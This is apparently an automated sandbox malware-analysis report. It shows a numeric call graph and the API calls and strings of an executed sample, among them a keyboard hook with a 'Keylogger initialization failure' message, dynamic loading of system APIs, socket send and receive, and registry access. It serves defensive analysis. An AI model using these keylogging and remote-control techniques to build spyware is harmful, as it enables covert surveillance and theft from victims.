48288 402055 11 API calls 48287->48288 48289 402f2d 48288->48289 48289->47816 48290->47819 48292 4025f0 28 API calls 48291->48292 48293 401fbd 48292->48293 48293->48287 48295 40a162 48294->48295 48296 413584 3 API calls 48295->48296 48297 40a169 48296->48297 48298 40a197 48297->48298 48299 40a17d 48297->48299 48315 409097 48298->48315 48301 40a182 48299->48301 48302 409ed6 48299->48302 48304 409097 28 API calls 48301->48304 48302->47494 48306 40a190 48304->48306 48343 40a268 29 API calls 48306->48343 48308 40a195 48308->48302 48309->47844 48483 403222 48310->48483 48312 403022 48487 403262 48312->48487 48316 4090ad 48315->48316 48317 402252 11 API calls 48316->48317 48318 4090c7 48317->48318 48344 404267 48318->48344 48320 4090d5 48321 40a1b4 48320->48321 48356 40b927 48321->48356 48324 40a205 48326 402093 28 API calls 48324->48326 48325 40a1dd 48327 402093 28 API calls 48325->48327 48328 40a210 48326->48328 48329 40a1e7 48327->48329 48330 402093 28 API calls 48328->48330 48331 41bcef 28 API calls 48329->48331 48332 40a21f 48330->48332 48333 40a1f5 48331->48333 48334 41b580 80 API calls 48332->48334 48360 40b19f 31 API calls _Yarn 48333->48360 48337 40a224 CreateThread 48334->48337 48336 40a1fc 48338 401fd8 11 API calls 48336->48338 48339 40a24b CreateThread 48337->48339 48340 40a23f CreateThread 48337->48340 48368 40a2b8 48337->48368 48338->48324 48341 401f09 11 API calls 48339->48341 48365 40a2c4 48339->48365 48340->48339 48362 40a2a2 48340->48362 48342 40a25f 48341->48342 48342->48302 48343->48308 48482 40a2ae 162 API calls 48343->48482 48345 402888 22 API calls 48344->48345 48346 40427b 48345->48346 48347 404290 48346->48347 48348 4042a5 48346->48348 48354 4042df 22 API calls 48347->48354 48350 4027e6 28 API calls 48348->48350 48353 4042a3 48350->48353 48351 404299 48355 402c48 22 API calls 48351->48355 48353->48320 48354->48351 48355->48353 48357 40b930 48356->48357 48358 40a1d2 48356->48358 48361 40b9a7 28 API calls 48357->48361 48358->48324 48358->48325 48360->48336 48361->48358 48371 40a2f3 48362->48371 48389 40ad11 48365->48389 48432 40a761 48368->48432 48372 40a30c SetWindowsHookExA 48371->48372 48373 40a36e GetMessageA 48371->48373 48372->48373 48376 40a328 GetLastError 48372->48376 48374 40a380 TranslateMessage DispatchMessageA 48373->48374 48386 40a2ab 48373->48386 48374->48373 48374->48386 48387 41bc1f 28 API calls 48376->48387 48378 40a339 48388 4052fd 28 API calls 48378->48388 48387->48378 48396 40ad1f 48389->48396 48390 40a2cd 48391 40ad79 Sleep GetForegroundWindow GetWindowTextLengthW 48393 40b93f 28 API calls 48391->48393 48393->48396 48396->48390 48396->48391 48399 40adbf GetWindowTextW 48396->48399 48415 40add9 48396->48415 48419 43445a EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 48396->48419 48420 401f86 48396->48420 48424 434801 23 API calls __onexit 48396->48424 48425 43441b SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_footer 48396->48425 48398 41bb77 GetTickCount 48398->48415 48399->48396 48401 401f09 11 API calls 48401->48415 48402 40af17 48404 401f09 11 API calls 48402->48404 48403 40b927 28 API calls 48403->48415 48404->48390 48405 40ae84 Sleep 48405->48415 48408 402093 28 API calls 48408->48415 48409 409097 28 API calls 48409->48415 48413 403014 28 API calls 48413->48415 48414 406383 28 API calls 48414->48415 48415->48396 48415->48398 48415->48401 48415->48402 48415->48403 48415->48405 48415->48408 48415->48409 48415->48413 48415->48414 48416 41bcef 28 API calls 48415->48416 48417 40a671 12 API calls 48415->48417 48418 401fd8 11 API calls 48415->48418 48426 40907f 28 API calls 48415->48426 48427 40b19f 31 API calls _Yarn 48415->48427 48428 40b9b7 28 API calls 48415->48428 48429 40b783 40 API calls 2 library calls 48415->48429 48430 441ed1 20 API calls 48415->48430 48431 4052fd 28 API calls 48415->48431 48416->48415 48417->48415 48418->48415 48421 401f8e 48420->48421 48422 402252 11 API calls 48421->48422 48423 401f99 48422->48423 48423->48396 48424->48396 48425->48396 48426->48415 48427->48415 48428->48415 48429->48415 48430->48415 48433 40a776 Sleep 48432->48433 48456 40a6b0 48433->48456 48435 40a2c1 48436 40a7b6 CreateDirectoryW 48454 40a788 48436->48454 48437 40a7c7 GetFileAttributesW 48437->48454 48438 40a7de SetFileAttributesW 48438->48454 48439 4020df 11 API calls 48439->48454 48441 40a858 PathFileExistsW 48449 40a863 48441->48449 48441->48454 48442 401e65 22 API calls 48442->48454 48443 4020df 11 API calls 48443->48449 48444 4020b7 28 API calls 48444->48454 48446 40a961 SetFileAttributesW 48446->48454 48447 401fd8 11 API calls 48447->48454 48448 406e13 28 API calls 48448->48449 48449->48443 48449->48447 48449->48448 48450 401fe2 28 API calls 48449->48450 48452 401fd8 11 API calls 48449->48452 48479 41c516 32 API calls 48449->48479 48450->48449 48451 406e13 28 API calls 48451->48454 48452->48449 48454->48433 48454->48435 48454->48436 48454->48437 48454->48438 48454->48439 48454->48441 48454->48442 48454->48444 48454->48446 48454->48451 48455 401fd8 11 API calls 48454->48455 48469 41c482 48454->48469 48480 41c583 CreateFileW SetFilePointer CloseHandle WriteFile CloseHandle 48454->48480 48455->48454 48457 40a75d 48456->48457 48459 40a6c6 48456->48459 48457->48454 48458 40a6e5 CreateFileW 48458->48459 48460 40a6f3 GetFileSize 48458->48460 48459->48458 48461 40a728 CloseHandle 48459->48461 48462 40a73a 48459->48462 48463 40a716 48459->48463 48464 40a71d Sleep 48459->48464 48460->48459 48460->48461 48461->48459 48462->48457 48466 409097 28 API calls 48462->48466 48481 40b117 84 API calls 48463->48481 48464->48461 48467 40a756 48466->48467 48468 40a1b4 123 API calls 48467->48468 48468->48457 48470 41c495 CreateFileW 48469->48470 48472 41c4d2 48470->48472 48473 41c4ce 48470->48473 48474 41c4f2 WriteFile 48472->48474 48475 41c4d9 SetFilePointer 48472->48475 48473->48454 48476 41c505 48474->48476 48477 41c507 CloseHandle 48474->48477 48475->48474 48478 41c4e9 CloseHandle 48475->48478 48476->48477 48477->48473 48478->48473 48479->48449 48480->48454 48481->48464 48484 40322e 48483->48484 48493 403618 48484->48493 48486 40323b 48486->48312 48488 40326e 48487->48488 48489 402252 11 API calls 48488->48489 48490 403288 48489->48490 48491 402336 11 API calls 48490->48491 48492 403031 48491->48492 48492->47849 48494 403626 48493->48494 48495 403644 48494->48495 48496 40362c 48494->48496 48498 40365c 48495->48498 48499 40369e 48495->48499 48504 4036a6 28 API calls 48496->48504 48502 4027e6 28 API calls 48498->48502 48503 403642 48498->48503 48505 4028a4 22 API calls 48499->48505 48502->48503 48503->48486 48504->48503 48507 404186 48506->48507 48508 402252 11 API calls 48507->48508 48509 404191 48508->48509 48517 4041bc 48509->48517 48512 4042fc 48528 404353 48512->48528 48514 40430a 48515 403262 11 API calls 48514->48515 48516 404319 48515->48516 48516->47857 48518 4041c8 48517->48518 48521 4041d9 48518->48521 48520 40419c 48520->48512 48522 4041e9 48521->48522 48523 404206 48522->48523 48524 4041ef 48522->48524 48525 4027e6 28 API calls 48523->48525 48526 404267 28 API calls 48524->48526 48527 404204 48525->48527 48526->48527 48527->48520 48529 40435f 48528->48529 48532 404371 48529->48532 48531 40436d 48531->48514 48533 40437f 48532->48533 48534 404385 48533->48534 48535 40439e 48533->48535 48598 4034e6 28 API calls 48534->48598 48536 402888 22 API calls 48535->48536 48537 4043a6 48536->48537 48539 404419 48537->48539 48540 4043bf 48537->48540 48599 4028a4 22 API calls 48539->48599 48542 4027e6 28 API calls 48540->48542 48551 40439c 48540->48551 48542->48551 48551->48531 48598->48551 48606 43ab1a 48600->48606 48604 4138f4 48603->48604 48605 4138ca RegSetValueExA RegCloseKey 48603->48605 48604->47873 48605->48604 48609 43aa9b 48606->48609 48608 40170d 48608->47875 48610 43aaaa 48609->48610 48611 43aabe 48609->48611 48615 44062d 20 API calls _free 48610->48615 48614 43aaaf pre_c_initialization __alldvrm 48611->48614 48616 4489d7 11 API calls 2 library calls 48611->48616 48614->48608 48615->48614 48616->48614 48620 41b98a ctype ___scrt_get_show_window_mode 48617->48620 48618 402093 28 API calls 48619 414f84 48618->48619 48619->47882 48620->48618 48621->47899 48623 414f33 48622->48623 48624 414f3d WSASetLastError 48622->48624 48740 414dc1 29 API calls ___std_exception_copy 48623->48740 48624->47927 48626 414f38 48626->48624 48629 404846 socket 48628->48629 48630 404839 48628->48630 48631 404860 CreateEventW 48629->48631 48632 404842 48629->48632 48741 40489e WSAStartup 48630->48741 48631->47927 48632->47927 48634 40483e 48634->48629 48634->48632 48636 404f65 48635->48636 48637 404fea 48635->48637 48638 404f6e 48636->48638 48639 404fc0 CreateEventA CreateThread 48636->48639 48640 404f7d GetLocalTime 48636->48640 48637->47927 48638->48639 48639->48637 48744 405150 48639->48744 48742 41bc1f 28 API calls 48640->48742 48642 404f91 48743 4052fd 28 API calls 48642->48743 48651 404a1b 48650->48651 48652 4048ee 48650->48652 48653 40497e 48651->48653 48654 404a21 WSAGetLastError 48651->48654 48652->48653 48656 40531e 28 API calls 48652->48656 48676 404923 48652->48676 48653->47927 48654->48653 48655 404a31 48654->48655 48657 404932 48655->48657 48658 404a36 48655->48658 48660 40490f 48656->48660 48663 402093 28 API calls 48657->48663 48759 41cb72 30 API calls 48658->48759 48664 402093 28 API calls 48660->48664 48662 40492b 48662->48657 48666 404941 48662->48666 48667 404a80 48663->48667 48668 40491e 48664->48668 48665 404a40 48760 4052fd 28 API calls 48665->48760 48673 404950 48666->48673 48674 404987 48666->48674 48670 402093 28 API calls 48667->48670 48671 41b580 80 API calls 48668->48671 48675 404a8f 48670->48675 48671->48676 48678 402093 28 API calls 48673->48678 48756 421ad1 54 API calls 48674->48756 48679 41b580 80 API calls 48675->48679 48748 420cf1 27 API calls 48676->48748 48682 40495f 48678->48682 48679->48653 48685 402093 28 API calls 48682->48685 48683 40498f 48686 4049c4 48683->48686 48687 404994 48683->48687 48689 40496e 48685->48689 48758 420e97 28 API calls 48686->48758 48691 402093 28 API calls 48687->48691 48694 41b580 80 API calls 48689->48694 48693 4049a3 48691->48693 48696 402093 28 API calls 48693->48696 48697 404973 48694->48697 48695 4049cc 48698 4049f9 CreateEventW CreateEventW 48695->48698 48700 402093 28 API calls 48695->48700 48699 4049b2 48696->48699 48749 420d31 48697->48749 48698->48653 48701 41b580 80 API calls 48699->48701 48703 4049e2 48700->48703 48704 4049b7 48701->48704 48705 402093 28 API calls 48703->48705 48757 421143 52 API calls 48704->48757 48707 4049f1 48705->48707 48708 41b580 80 API calls 48707->48708 48709 4049f6 48708->48709 48709->48698 48711 404e40 SetEvent CloseHandle 48710->48711 48712 404e57 closesocket 48710->48712 48713 404ed8 48711->48713 48714 404e64 48712->48714 48713->47927 48715 404e73 48714->48715 48716 404e7a 48714->48716 48763 4050e4 84 API calls 48715->48763 48718 404e8c WaitForSingleObject 48716->48718 48719 404ece SetEvent CloseHandle 48716->48719 48720 420d31 3 API calls 48718->48720 48719->48713 48721 404e9b SetEvent WaitForSingleObject 48720->48721 48722 420d31 3 API calls 48721->48722 48723 404eb3 SetEvent CloseHandle CloseHandle 48722->48723 48723->48719 48724->47927 48725->47927 48727->47927 48728->47927 48729->47927 48730->47955 48731->47955 48732->47955 48733->47955 48734->47955 48735->47955 48736->47955 48737->47955 48738->47955 48739->47955 48740->48626 48741->48634 48742->48642 48747 40515c 102 API calls 48744->48747 48746 405159 48747->48746 48748->48662 48750 41e7a2 48749->48750 48751 420d39 48749->48751 48752 41e7b0 48750->48752 48761 41d8ec DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48750->48761 48751->48653 48762 41e4d2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48752->48762 48755 41e7b7 48756->48683 48757->48697 48758->48695 48759->48665 48761->48752 48762->48755 48763->48716 48765->47995 48766->48019 48767->48018 48768->48008 48769->48013 48770->48020 48771->48048 48776 40f7fd 48774->48776 48775 413584 3 API calls 48775->48776 48776->48775 48777 40f8a1 48776->48777 48779 40f891 Sleep 48776->48779 48794 40f82f 48776->48794 48780 409097 28 API calls 48777->48780 48778 409097 28 API calls 48778->48794 48779->48776 48783 40f8ac 48780->48783 48782 41bcef 28 API calls 48782->48794 48784 41bcef 28 API calls 48783->48784 48785 40f8b8 48784->48785 48809 41384f 14 API calls 48785->48809 48788 401f09 11 API calls 48788->48794 48789 40f8cb 48790 401f09 11 API calls 48789->48790 48792 40f8d7 48790->48792 48791 402093 28 API calls 48791->48794 48793 402093 28 API calls 48792->48793 48795 40f8e8 48793->48795 48794->48778 48794->48779 48794->48782 48794->48788 48794->48791 48796 4137aa 14 API calls 48794->48796 48807 40d0d1 112 API calls ___scrt_get_show_window_mode 48794->48807 48808 41384f 14 API calls 48794->48808 48797 4137aa 14 API calls 48795->48797 48796->48794 48798 40f8fb 48797->48798 48810 41288b TerminateProcess WaitForSingleObject 48798->48810 48800 40f903 ExitProcess 48811 412829 62 API calls 48802->48811 48808->48794 48809->48789 48810->48800 48812 42f97e 48813 42f989 48812->48813 48815 42f99d 48813->48815 48816 432f7f 48813->48816 48817 432f8a 48816->48817 48818 432f8e 48816->48818 48817->48815 48820 440f5d 48818->48820 48821 446206 48820->48821 48822 446213 48821->48822 48823 44621e 48821->48823 48825 4461b8 ___crtLCMapStringA 21 API calls 48822->48825 48824 446226 48823->48824 48831 44622f __Getctype 48823->48831 48833 446802 20 API calls _free 48824->48833 48829 44621b 48825->48829 48827 446234 48834 44062d 20 API calls _free 48827->48834 48828 446259 RtlReAllocateHeap 48828->48829 48828->48831 48829->48817 48831->48827 48831->48828 48835 443001 7 API calls 2 library calls 48831->48835 48833->48829 48834->48829 48835->48831 48836 40165e 48837 401666 48836->48837 48838 401669 48836->48838 48839 4016a8 48838->48839 48841 401696 48838->48841 48840 43455e new 22 API calls 48839->48840 48842 40169c 48840->48842 48843 43455e new 22 API calls 48841->48843 48843->48842 48844 426cdc 48849 426d59 send 48844->48849 48850 41e04e 48851 41e063 ctype ___scrt_get_show_window_mode 48850->48851 48852 432f55 21 API calls 48851->48852 48863 41e266 48851->48863 48856 41e213 ___scrt_get_show_window_mode 48852->48856 48854 41e277 48857 41e21a 48854->48857 48865 432f55 48854->48865 48856->48857 48858 432f55 21 API calls 48856->48858 48861 41e240 ___scrt_get_show_window_mode 48858->48861 48859 41e2b0 ___scrt_get_show_window_mode 48859->48857 48870 4335db 48859->48870 48861->48857 48862 432f55 21 API calls 48861->48862 48862->48863 48863->48857 48864 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 48863->48864 48864->48854 48866 432f63 48865->48866 48867 432f5f 48865->48867 48868 43bda0 _Yarn 21 API calls 48866->48868 48867->48859 48869 432f68 48868->48869 48869->48859 48873 4334fa 48870->48873 48872 4335e3 48872->48857 48874 433513 48873->48874 48878 433509 48873->48878 48875 432f55 21 API calls 48874->48875 48874->48878 48876 433534 48875->48876 48876->48878 48879 4338c8 CryptAcquireContextA 48876->48879 48878->48872 48880 4338e4 48879->48880 48881 4338e9 CryptGenRandom 48879->48881 48880->48878 48881->48880 48882 4338fe CryptReleaseContext 48881->48882 48882->48880 48883 426c6d 48889 426d42 recv 48883->48889

                                                                Executed Functions

                                                                Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$LibraryLoad$HandleModule
                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                • API String ID: 4236061018-3687161714
                                                                • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                                • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                                                                Function 0040A2F3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63windowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1277 40a2f3-40a30a 1278 40a30c-40a326 SetWindowsHookExA 1277->1278 1279 40a36e-40a37e GetMessageA 1277->1279 1278->1279 1284 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1278->1284 1280 40a380-40a398 TranslateMessage DispatchMessageA 1279->1280 1281 40a39a 1279->1281 1280->1279 1280->1281 1282 40a39c-40a3a1 1281->1282 1284->1282
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                • GetLastError.KERNEL32 ref: 0040A328
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                                • TranslateMessage.USER32(?), ref: 0040A385
                                                                • DispatchMessageA.USER32(?), ref: 0040A390
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                • String ID: Keylogger initialization failure: error $`Mw
                                                                • API String ID: 3219506041-1277971878
                                                                • Opcode ID: 25e136c2ffc33636d357cd73d29a3aedc6f18b6bf984cd9f7b53386870d4f0b3
                                                                • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                • Opcode Fuzzy Hash: 25e136c2ffc33636d357cd73d29a3aedc6f18b6bf984cd9f7b53386870d4f0b3
                                                                • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                                Function 0040F7E2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                  • Part of subcall function 00413584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                                  • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                • ExitProcess.KERNEL32 ref: 0040F905
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                • String ID: 5.1.1 Pro$override$pth_unenc
                                                                • API String ID: 2281282204-2344886030
                                                                • Opcode ID: cd607c0515279b9d97aeea635d6f29185ab9b792f25f3438d110feeae55dec5d
                                                                • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                • Opcode Fuzzy Hash: cd607c0515279b9d97aeea635d6f29185ab9b792f25f3438d110feeae55dec5d
                                                                • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                                Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1427 404f51-404f5f 1428 404f65-404f6c 1427->1428 1429 404fea 1427->1429 1431 404f74-404f7b 1428->1431 1432 404f6e-404f72 1428->1432 1430 404fec-404ff1 1429->1430 1433 404fc0-404fe8 CreateEventA CreateThread 1431->1433 1434 404f7d-404fbb GetLocalTime call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1431->1434 1432->1433 1433->1430 1434->1433
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                Strings
                                                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$EventLocalThreadTime
                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                • API String ID: 2532271599-1507639952
                                                                • Opcode ID: 0f2139c50ef680eb2eec6eafdf8633bec5d9f7b08799dddc17b73162f3ba6cee
                                                                • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                • Opcode Fuzzy Hash: 0f2139c50ef680eb2eec6eafdf8633bec5d9f7b08799dddc17b73162f3ba6cee
                                                                • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,01177260), ref: 004338DA
                                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                • String ID:
                                                                • API String ID: 1815803762-0
                                                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                Function 0041B69E Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                                                • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
